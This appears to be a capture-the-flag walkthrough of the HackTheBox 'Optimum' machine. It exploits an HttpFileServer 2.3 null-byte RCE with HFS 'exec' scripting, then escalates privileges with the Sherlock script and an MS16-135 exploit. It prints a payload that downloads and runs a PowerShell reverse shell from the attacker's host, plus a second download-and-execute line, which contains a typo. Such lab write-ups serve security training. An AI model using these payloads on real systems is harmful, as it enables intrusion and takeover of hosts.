HackTheBox — Optimum
Hey guys, what’s going on, this is shellbreak and we’ll be doing optimum from Hackthebox which is rated as easy.
The Idea of the box is an HTTPFileServer that has a RCE vulnerability which we’ll be using to get a shell on the box, once we get a shell on the box, then for the privesc we’ll use a powershell script called Sherlock.ps1 to enumerate the box locally and get a root shell.
So, enough talking and let’s jump in.
As always we’ll start with nmap scanning:
nmap -sC -sV -oA nmap/optimum 10.10.10.8
As you can see we have one port open which is 80, and its banner is telling us that it’s HttpFileServer version 2.3.
After google’ing around, I found that this server has a RCE vulnerability,
check this URL to read more about it:
Web Enumeration:
The idea of the vulnerability is that the search feature in the app fails to handle null bytes.
The input in the search feature is filtered with a regex, so using a null byte we can terminate the regex string and then insert the command we want.
While google’ing for CVEs I saw that the server has a special scripting language (HFS scripting) using which we’ll execute our commands on the box.
See this page if you like to have an idea about the scripting language:
we’ll be using “exec” function to execute commands:
{.exec|command.}
Exploitation:
Using burp to intercept the request (after submitting our input inside search box)
Now since the box is 64-bit I’ll use a 64-bit powershell to upload my shell.
you can get the script that I’ll be using from this github repo:
I’m going to use Invoke-PowerShellTcp.ps1 script, but before that we have to edit the script and add to invoke the right function and add our ip address:
copy this line and add it to the end of the script:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 1234
Note: run python simple http server so you can download on the box.
the payload should look like:
%00{.exec|c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.34:8000/Invoke-PowerShellTcp.ps1.}
Now on burp:
Don’t forget to set your netcat listener on port 1234.
And we got a user shell:
Now let’s upload Sherlock script to enumerate the box and see if we’ll get anything.
you cat get the script from this repo:
Note: you need to invoke the function you want to execute in the end of sherlock script (In my case it’s Find-AllVulns).
Now download the script on the box:
And we can see that the server is vulnerable to MS16–135, so let’s get the exploit and see if it’s going to work.
Download the exploit from this URL:
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-135/MS16-135.ps1
Now let’s download the script on the box:
IEX(Net-Object Net.WebClient).downloadString(‘http://10.10.14.34:8000/ms16–135.ps1’)
And indeed we got root on the box.
So, this is how we own root on Optimum box, I hope you guys enjoyed it and I’ll see you all in the next write-up.